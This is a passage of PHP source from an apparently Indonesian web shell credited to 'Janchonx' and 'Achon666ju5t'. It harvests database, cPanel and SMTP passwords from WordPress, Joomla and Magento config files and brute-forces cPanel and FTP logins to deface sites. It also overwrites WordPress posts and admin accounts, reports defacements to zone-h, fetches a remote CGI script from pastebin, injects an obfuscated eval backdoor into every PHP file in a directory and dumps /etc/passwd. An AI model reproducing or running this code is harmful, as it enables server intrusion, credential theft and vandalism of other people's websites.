  3193.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3194.                     }
  3195.                 }
  3196.             }
  3197.         }
  3198.         if($i == 0) {
  3199.         } else {
  3200.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>Janchonx</font>";
  3201.         }
  3202.     } else {
  3203.         echo "<center>
  3204.         <form method='post'>
  3205.         USER: <br>
  3206.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3207.         $_usercp = fopen("/etc/passwd","r");
  3208.         while($getu = fgets($_usercp)) {
  3209.             if($getu == '' || !$_usercp) {
  3210.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3211.             } else {
  3212.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3213.                 foreach($u[1] as $user_cp) {
  3214.                         if(is_dir("/home/$user_cp/public_html")) {
  3215.                             echo "$user_cp\n";
  3216.                     }
  3217.                 }
  3218.             }
  3219.         }
  3220.         echo "</textarea><br>
  3221.         PASS: <br>
  3222.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3223.         function cp_pass($dir) {
  3224.             $pass = "";
  3225.             $dira = scandir($dir);
  3226.             foreach($dira as $dirb) {
  3227.                 if(!is_file("$dir/$dirb")) continue;
  3228.                 $ambil = file_get_contents("$dir/$dirb");
  3229.                 if(preg_match("/WordPress/", $ambil)) {
  3230.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3231.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3232.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3233.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3234.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3235.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3236.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3237.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3238.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3239.                 } elseif(preg_match("/client/", $ambil)) {
  3240.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3241.                     if(preg_match('/"/', $pass1[1])) {
  3242.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3243.                         $pass .= $pass1[1]."\n";
  3244.                     }
  3245.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3246.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3247.                 }
  3248.             }
  3249.             echo $pass;
  3250.         }
  3251.         $cp_pass = cp_pass($dir);
  3252.         echo $cp_pass;
  3253.         echo "</textarea><br>
  3254.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3255.         </form>
  3256.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3257.     }
  3258. } elseif($_GET['do'] == 'smtp') {
  3259.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3260.     function scj($dir) {
  3261.         $dira = scandir($dir);
  3262.         foreach($dira as $dirb) {
  3263.             if(!is_file("$dir/$dirb")) continue;
  3264.             $ambil = file_get_contents("$dir/$dirb");
  3265.             $ambil = str_replace("$", "", $ambil);
  3266.             if(preg_match("/JConfig|joomla/", $ambil)) {
  3267.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3268.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3269.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3270.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3271.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3272.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3273.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3274.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3275.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3276.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3277.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3278.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3279.             }
  3280.         }
  3281.     }
  3282.     $smpt_hunter = scj($dir);
  3283.     echo $smpt_hunter;
  3284. } elseif($_GET['do'] == 'auto_wp') {
  3285.     if($_POST['hajar']) {
  3286.         $title = htmlspecialchars($_POST['new_title']);
  3287.         $pn_title = str_replace(" ", "-", $title);
  3288.         if($_POST['cek_edit'] == "Y") {
  3289.             $script = $_POST['edit_content'];
  3290.         } else {
  3291.             $script = $title;
  3292.         }
  3293.         $conf = $_POST['config_dir'];
  3294.         $scan_conf = scandir($conf);
  3295.         foreach($scan_conf as $file_conf) {
  3296.             if(!is_file("$conf/$file_conf")) continue;
  3297.             $config = file_get_contents("$conf/$file_conf");
  3298.             if(preg_match("/WordPress/", $config)) {
  3299.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3300.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3301.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3302.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3303.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3304.                 $prefix = $dbprefix."posts";
  3305.                 $option = $dbprefix."options";
  3306.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3307.                 $db = mysql_select_db($dbname);
  3308.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3309.                 $result = mysql_fetch_array($q);
  3310.                 $id = $result[ID];
  3311.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3312.                 $result2 = mysql_fetch_array($q2);
  3313.                 $target = $result2[option_value];
  3314.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3315.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3316.                 echo "<div style='margin: 5px auto;'>";
  3317.                 if($target == '') {
  3318.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3319.                 } else {
  3320.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3321.                 }
  3322.                 if(!$update OR !$conn OR !$db) {
  3323.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3324.                 } else {
  3325.                     echo "<font color=lime>sukses di ganti.</font><br>";
  3326.                 }
  3327.                 echo "</div>";
  3328.                 mysql_close($conn);
  3329.             }
  3330.         }
  3331.     } else {
  3332.         echo "<center>
  3333.         <h1>Auto Edit Title+Content WordPress</h1>
  3334.         <form method='post'>
  3335.         DIR Config: <br>
  3336.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3337.         Set Title: <br>
  3338.         <input type='text' name='new_title' value='Hacked By Achon666ju5t' placeholder='New Title'><br><br>
  3339.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3340.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3341.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3342.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3343.         </form>
  3344.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3345.         ";
  3346.     }
  3347. } elseif($_GET['do'] == 'zoneh') {
  3348.     if($_POST['submit']) {
  3349.         $domain = explode("\r\n", $_POST['url']);
  3350.         $nick =  $_POST['nick'];
  3351.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3352.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3353.         function zoneh($url,$nick) {
  3354.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3355.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3356.                   curl_setopt($ch, CURLOPT_POST, true);
  3357.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3358.             return curl_exec($ch);
  3359.                   curl_close($ch);
  3360.         }
  3361.         foreach($domain as $url) {
  3362.             $zoneh = zoneh($url,$nick);
  3363.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3364.                 echo "$url -> <font color=lime>OK</font><br>";
  3365.             } else {
  3366.                 echo "$url -> <font color=red>ERROR</font><br>";
  3367.             }
  3368.         }
  3369.     } else {
  3370.         echo "<center><form method='post'>
  3371.         <u>Defacer</u>: <br>
  3372.         <input type='text' name='nick' size='50' value='Achon666ju5t'><br>
  3373.         <u>Domains</u>: <br>
  3374.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3375.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3376.         </form>";
  3377.     }
  3378.     echo "</center>";
  3379. }elseif($_GET['do'] == 'cpftp_auto') {
  3380.     if($_POST['crack']) {
  3381.         $usercp = explode("\r\n", $_POST['user_cp']);
  3382.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3383.         $i = 0;
  3384.         foreach($usercp as $ucp) {
  3385.             foreach($passcp as $pcp) {
  3386.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3387.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3388.                     } else {
  3389.                         $_SESSION[$ucp] = "1";
  3390.                         $_SESSION[$pcp] = "1";
  3391.                         if($ucp == '' || $pcp == '') {
  3392.                             //
  3393.                         } else {
  3394.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3395.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3396.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3397.                             if((!$ftp_login) || (!$ftp_conn)) {
  3398.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  3399.                             } else {
  3400.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  3401.                                 $fi = htmlspecialchars($_POST['file_deface']);
  3402.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3403.                                 if($deface) {
  3404.                                     $i++;
  3405.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  3406.                                     if(function_exists('posix_getpwuid')) {
  3407.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  3408.                                         if($domain_cp == '') {
  3409.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3410.                                         } else {
  3411.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3412.                                             foreach($domains_cp[1] as $dj) {
  3413.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3414.                                                 $user_cp_url = $user_cp_url['name'];
  3415.                                                 if($user_cp_url == $ucp) {
  3416.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3417.                                                     break;
  3418.                                                 }
  3419.                                             }
  3420.                                         }
  3421.                                     } else {
  3422.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3423.                                     }
  3424.                                 } else {
  3425.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3426.                                 }
  3427.                             }
  3428.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3429.                         }
  3430.                     }
  3431.                 }
  3432.             }
  3433.         }
  3434.         if($i == 0) {
  3435.         } else {
  3436.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Janchonx.</font>";
  3437.         }
  3438.     } else {
  3439.         echo "<center>
  3440.         <form method='post'>
  3441.         Filename: <br>
  3442.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3443.         Deface Page: <br>
  3444.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  3445.         USER: <br>
  3446.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3447.         $_usercp = fopen("/etc/passwd","r");
  3448.         while($getu = fgets($_usercp)) {
  3449.             if($getu == '' || !$_usercp) {
  3450.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3451.             } else {
  3452.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3453.                 foreach($u[1] as $user_cp) {
  3454.                         if(is_dir("/home/$user_cp/public_html")) {
  3455.                             echo "$user_cp\n";
  3456.                     }
  3457.                 }
  3458.             }
  3459.         }
  3460.         echo "</textarea><br>
  3461.         PASS: <br>
  3462.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3463.         function cp_pass($dir) {
  3464.             $pass = "";
  3465.             $dira = scandir($dir);
  3466.             foreach($dira as $dirb) {
  3467.                 if(!is_file("$dir/$dirb")) continue;
  3468.                 $ambil = file_get_contents("$dir/$dirb");
  3469.                 if(preg_match("/WordPress/", $ambil)) {
  3470.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3471.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3472.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3473.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3474.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3475.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3476.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3477.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3478.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3479.                 } elseif(preg_match("/client/", $ambil)) {
  3480.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3481.                     if(preg_match('/"/', $pass1[1])) {
  3482.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3483.                         $pass .= $pass1[1]."\n";
  3484.                     }
  3485.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3486.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3487.                 }
  3488.             }
  3489.             echo $pass;
  3490.         }
  3491.         $cp_pass = cp_pass($dir);
  3492.         echo $cp_pass;
  3493.         echo "</textarea><br>
  3494.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3495.         </form>
  3496.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3497.     }
  3498. }
  3499.  elseif($_GET['do'] == 'cgi') {
  3500.     $cgi_dir = mkdir('idx_cgi', 0755);
  3501.     $file_cgi = "idx_cgi/cgi.izo";
  3502.     $isi_htcgi = "AddHandler cgi-script .izo";
  3503.     $htcgi = fopen(".htaccess", "w");
  3504.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3505.     $cgi = fopen($file_cgi, "w");
  3506.     fwrite($cgi, $cgi_script);
  3507.     fwrite($htcgi, $isi_htcgi);
  3508.     chmod($file_cgi, 0755);
  3509.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3510. } elseif($_GET['do'] == 'fake_root') {
  3511.     ob_start();
  3512.     function reverse($url) {
  3513.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3514.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3515.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  3516.               curl_setopt($ch, CURLOPT_HEADER, 0);
  3517.               curl_setopt($ch, CURLOPT_POST, 1);
  3518.         $resp = curl_exec($ch);
  3519.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3520.         $array = explode(",,", $resp);
  3521.         unset($array[0]);
  3522.         foreach($array as $lnk) {
  3523.             $lnk = "http://$lnk";
  3524.             $lnk = str_replace(",", "", $lnk);
  3525.             echo $lnk."\n";
  3526.             ob_flush();
  3527.             flush();
  3528.         }
  3529.               curl_close($ch);
  3530.     }
  3531.     function cek($url) {
  3532.         $ch = curl_init($url);
  3533.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3534.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3535.         $resp = curl_exec($ch);
  3536.         return $resp;
  3537.     }
  3538.     $cwd = getcwd();
  3539.     $ambil_user = explode("/", $cwd);
  3540.     $user = $ambil_user[2];
  3541.     if($_POST['reverse']) {
  3542.         $site = explode("\r\n", $_POST['url']);
  3543.         $file = $_POST['file'];
  3544.         foreach($site as $url) {
  3545.             $cek = cek("$url/~$user/$file");
  3546.             if(preg_match("/hacked/i", $cek)) {
  3547.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3548.             }
  3549.         }
  3550.     } else {
  3551.         echo "<center><form method='post'>
  3552.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3553.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3554.         Domain: <br>
  3555.         <textarea style='width: 450px; height: 250px;' name='url'>";
  3556.         reverse($_SERVER['HTTP_HOST']);
  3557.         echo "</textarea><br>
  3558.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3559.         </form><br>
  3560.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3561.     }
  3562. } elseif($_GET['do'] == 'adminer') {
  3563.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3564.     function adminer($url, $isi) {
  3565.         $fp = fopen($isi, "w");
  3566.         $ch = curl_init();
  3567.               curl_setopt($ch, CURLOPT_URL, $url);
  3568.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3569.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3570.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3571.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3572.         return curl_exec($ch);
  3573.               curl_close($ch);
  3574.         fclose($fp);
  3575.         ob_flush();
  3576.         flush();
  3577.     }
  3578.     if(file_exists('adminer.php')) {
  3579.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3580.     } else {
  3581.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3582.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3583.         } else {
  3584.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3585.         }
  3586.     }
  3587. }elseif($_GET['do'] == 'injectcode') {?><center>
  3588.         <form method='POST'>
  3589.         <table>
  3590.         <tr>
  3591.             <td width="100" class="title">
  3592.                         Directory
  3593.                     </td>
  3594.                     <td>
  3595.                          <input type='text' style="width: 400px;" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
  3596.                     </td>
  3597.                    
  3598.                 </tr>
  3599.                 <tr>
  3600.                 <td class="title">
  3601.                     Mode
  3602.                 </td>
  3603.                 <td>
  3604.                         <select style="width: 400px;" name="mode" class="box">
  3605.                             <option value="Apender">Apender</option>
  3606.                             <option value="Overwriter">Overwriter</option>
  3607.                         </select>
  3608.                 </td>
  3609.                 </tr>
  3610.                 <tr>
  3611.                     <td class="title">
  3612.                         File Type
  3613.                     </td>
  3614.                     <td>
  3615.                         <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
  3616.                     </td>
  3617.                 </tr>
  3618.                 <tr>
  3619.             <td>Create A backdoor by injecting this code in every php file of current directory</td>
  3620.         </tr>
  3621.                
  3622.                 <tr>
  3623.                     <td colspan="2">
  3624.                         <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoInkwelRVSWwzZHcySlZrcFVpdFdzVGkxTHpORklyOHJNUzh0SkxFblZTRW9zVGpVemlVOUpUYzVQU2RWSXk4eEpqVTlQTFlsUHpzOHJTYzByS2RaUXlpZ3BLYkRTMXk5SUxDNUpUY3JNMDB2T3o5VXZTaXpYVC9VemN5d3NUTXhXMGdRQzYxb0EiKSkpOw0KPz4="); ?></textarea>
  3625.                     </td>
  3626.                 </tr>
  3627.                 <tr>
  3628.                     <td rowspan="2">
  3629.                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
  3630.                     </td>
  3631.                 </tr>
  3632.         </form>
  3633.         </table><div id="showinject"</div> <?php
  3634. $filetype = $_POST['filetype'];
  3635. $mode = "a";
  3636. if($_POST['mode'] == 'Apender')
  3637. $mode = "a";
  3638.  if($_POST['mode'] == 'Overwriter')
  3639. $mode = "w";
  3640. if (is_dir($_POST['pathtomass']))
  3641. {
  3642. $lolinject = $_POST['injectthis'];
  3643. $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
  3644. if(substr($_POST['pathtomass'], -1) == "\\")
  3645. $mypath = $_POST['pathtomass'] . "*.".$filetype;
  3646. foreach (glob($mypath) as $injectj00)
  3647. {
  3648. if($injectj00 == __FILE__)
  3649. continue;
  3650. $fp=fopen($injectj00,$mode);
  3651. if (fputs($fp,$lolinject))
  3652. echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
  3653. else
  3654. echo 'failed to inject '.$injectj00.'<br>';
  3655. }
  3656. }
  3657. else
  3658. echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
  3659. }
  3660.  
  3661. elseif($_GET['do'] == 'passwbypass') {
  3662.     echo '<center>Bypass etc/passw With:<br>
  3663. <table style="width:50%">
  3664.   <tr>
  3665.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3666.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3667.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  3668.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  3669.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3670. </tr></table>Bypass User With : <table style="width:50%">
  3671. <tr>
  3672.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3673.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3674.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3675.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  3676.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3677. </tr>
  3678. </table><br>';
  3679.  
  3680.  
  3681. if ($_POST['awkuser']) {
  3682. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3683. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3684. echo "</textarea><br>";
  3685. }
  3686. if ($_POST['systuser']) {
  3687. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3688. echo system("ls /var/mail");
  3689. echo "</textarea><br>";
  3690. }
  3691. if ($_POST['passthuser']) {
  3692. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3693. echo passthru("ls /var/mail");
  3694. echo "</textarea><br>";
  3695. }
  3696. if ($_POST['exuser']) {
  3697. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3698. echo exec("ls /var/mail");
  3699. echo "</textarea><br>";
  3700. }
  3701. if ($_POST['shexuser']) {
  3702. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3703. echo shell_exec("ls /var/mail");
  3704. echo "</textarea><br>";
  3705. }
  3706. if($_POST['syst'])
  3707. {
  3708. echo"<textarea class='inputz' cols='65' rows='15'>";
  3709. echo system("cat /etc/passwd");
  3710. echo"</textarea><br><br><b></b><br>";
  3711. }
  3712. if($_POST['passth'])
  3713. {
  3714. echo"<textarea class='inputz' cols='65' rows='15'>";
  3715. echo passthru("cat /etc/passwd");
  3716. echo"</textarea><br><br><b></b><br>";
  3717. }
  3718. if($_POST['ex'])
  3719. {
  3720. echo"<textarea class='inputz' cols='65' rows='15'>";
  3721. echo exec("cat /etc/passwd");
  3722. echo"</textarea><br><br><b></b><br>";
  3723. }
  3724. if($_POST['shex'])
  3725. {
  3726. echo"<textarea class='inputz' cols='65' rows='15'>";
  3727. echo shell_exec("cat /etc/passwd");
  3728. echo"</textarea><br><br><b></b><br>";
  3729. }
  3730. echo '<center>';
  3731. if($_POST['melex'])
  3732. {
  3733. echo"<textarea class='inputz' cols='65' rows='15'>";
  3734. for($uid=0;$uid<60000;$uid++){
  3735. $ara = posix_getpwuid($uid);
  3736. if (!empty($ara)) {
  3737. while (list ($key, $val) = each($ara)){
  3738. print "$val:";
  3739. }
  3740. print "\n";
  3741. }
  3742. }
  3743. echo"</textarea><br><br>";
  3744. }
  3745. //
  3746.  
  3747. //
  3748. } elseif($_GET['do'] == 'auto_dwp') {
  3749.     if($_POST['auto_deface_wp']) {
  3750.         function anucurl($sites) {
  3751.             $ch = curl_init($sites);
  3752.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3753.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3754.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3755.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3756.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3757.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3758.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3759.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3760.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3761.             $data = curl_exec($ch);
  3762.                   curl_close($ch);
  3763.             return $data;
  3764.         }
  3765.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3766.             $post = array(
  3767.                    "log" => "$userr",
  3768.                    "pwd" => "$pass",
  3769.                    "rememberme" => "forever",
  3770.                    "wp-submit" => "$wp_submit",
  3771.                    "redirect_to" => "$web",
  3772.                    "testcookie" => "1",
  3773.                    );
  3774.             $ch = curl_init($cek);
  3775.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3776.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3777.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3778.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3779.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3780.                   curl_setopt($ch, CURLOPT_POST, 1);
  3781.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3782.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3783.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3784.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3785.             $data = curl_exec($ch);
  3786.                   curl_close($ch);
  3787.             return $data;
  3788.         }
  3789.         $scan = $_POST['link_config'];
  3790.         $link_config = scandir($scan);
  3791.         $script = htmlspecialchars($_POST['script']);
  3792.         $user = "achonx";
  3793.         $pass = "achonx";
  3794.         $passx = md5($pass);
  3795.         foreach($link_config as $dir_config) {
  3796.             if(!is_file("$scan/$dir_config")) continue;
  3797.             $config = file_get_contents("$scan/$dir_config");
  3798.             if(preg_match("/WordPress/", $config)) {
  3799.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3800.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3801.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3802.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3803.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3804.                 $prefix = $dbprefix."users";
  3805.                 $option = $dbprefix."options";
  3806.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3807.                 $db = mysql_select_db($dbname);
  3808.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3809.                 $result = mysql_fetch_array($q);
  3810.                 $id = $result[ID];
  3811.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3812.                 $result2 = mysql_fetch_array($q2);
  3813.                 $target = $result2[option_value];
  3814.                 if($target == '') {                
  3815.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3816.                 } else {
  3817.                     echo "[+] $target <br>";
  3818.                 }
  3819.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
